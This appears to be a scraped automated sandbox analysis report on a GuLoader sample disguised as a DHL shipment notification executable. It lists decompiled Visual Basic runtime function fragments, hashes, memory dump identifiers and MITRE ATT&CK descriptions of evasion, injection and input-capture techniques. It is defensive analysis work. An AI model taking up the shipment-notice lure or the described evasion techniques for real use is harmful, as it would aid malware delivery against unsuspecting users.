__vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 00413E3B
__vbaVarDup.MSVBVM60(00000000,00000000,?), ref: 00413E5C
#600.MSVBVM60(?,00000002,00000000,00000000,?), ref: 00413E67
__vbaFreeVar.MSVBVM60(?,00000002,00000000,00000000,?), ref: 00413E71

Strings

klverens, xrefs: 00413E4E

Memory Dump Source

Source File: 00000000.00000002.822108895.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.822099643.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.822132596.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#600ErrorFreeSystem
String ID: klverens
API String ID: 3931331424-2504283271
Opcode ID: 4440e17d5bae28b4c50e5ba16b81ac12b838cc8dcd4aeb39e5fc493e9a95d78a
Instruction ID: 0ab2eafd16684f4c9af2b1edd90fdf3b24a0e373e9acdaf2dbeba4b711a69988
Opcode Fuzzy Hash: 4440e17d5bae28b4c50e5ba16b81ac12b838cc8dcd4aeb39e5fc493e9a95d78a
Instruction Fuzzy Hash: C10112B0C01309BADB04DFA5C846AEEBABCEB08744F40816EF910F6190E7785A048F69

Uniqueness

Uniqueness Score: -1.00%

Function 00413E9B, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00413E9B(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr _v32;
				char _v40;
				char _t12;
				char* _t13;
				intOrPtr _t24;

				_push(0x401176);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_v12 = _t24 - 0x28;
				_v8 = 0x401150;
				_v24 = _v24 & 0x00000000;
				_t12 = 2;
				_v32 = _t12;
				_v40 = _t12;
				_t13 =  &_v40;
				_push(_t13);
				L0040122A();
				L00401230();
				L0040124E();
				_push(0x413f04);
				L00401266();
				return _t13;
			}

0x00413ea0
0x00413eab
0x00413eac
0x00413eb9
0x00413ebc
0x00413ec3
0x00413ec9
0x00413eca
0x00413ecd
0x00413ed0
0x00413ed3
0x00413ed4
0x00413ede
0x00413ee6
0x00413eeb
0x00413efe
0x00413f03

APIs

#536.MSVBVM60(?), ref: 00413ED4
__vbaStrMove.MSVBVM60(?), ref: 00413EDE
__vbaFreeVar.MSVBVM60(?), ref: 00413EE6
__vbaFreeStr.MSVBVM60(00413F04,?), ref: 00413EFE

Memory Dump Source

Source File: 00000000.00000002.822108895.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.822099643.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.822132596.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.822145627.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#536Move
String ID:
API String ID: 2764857095-0
Opcode ID: edd245329ca424ee47770c37d885d0cd66984a8f92bb8a222c8a73b3388b0b6f
Instruction ID: b1f38badd9ee3aba796644e4a5b3b556bd3e48e1ab5e3b80c795fd663544eed0
Opcode Fuzzy Hash: edd245329ca424ee47770c37d885d0cd66984a8f92bb8a222c8a73b3388b0b6f
Instruction Fuzzy Hash: C0F01DB1D10208ABDB04EB95CA46FEEB7B8EB08705F60406EF101B25D1E7782E058A69

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe PID: 4880 Parent PID: 620

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe PID: 4880 Parent PID: 620 nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCOMMON

Function 00413AA4, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 146
COMMON

Function 004012F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 240
COMMON

Function 00403FB2, Relevance: 1.4, APIs: 1, Instructions: 113
memoryCOMMON

Function 00413F17, Relevance: 65.0, APIs: 30, Strings: 7, Instructions: 227
COMMON

Function 00413D2A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 00413E9B, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON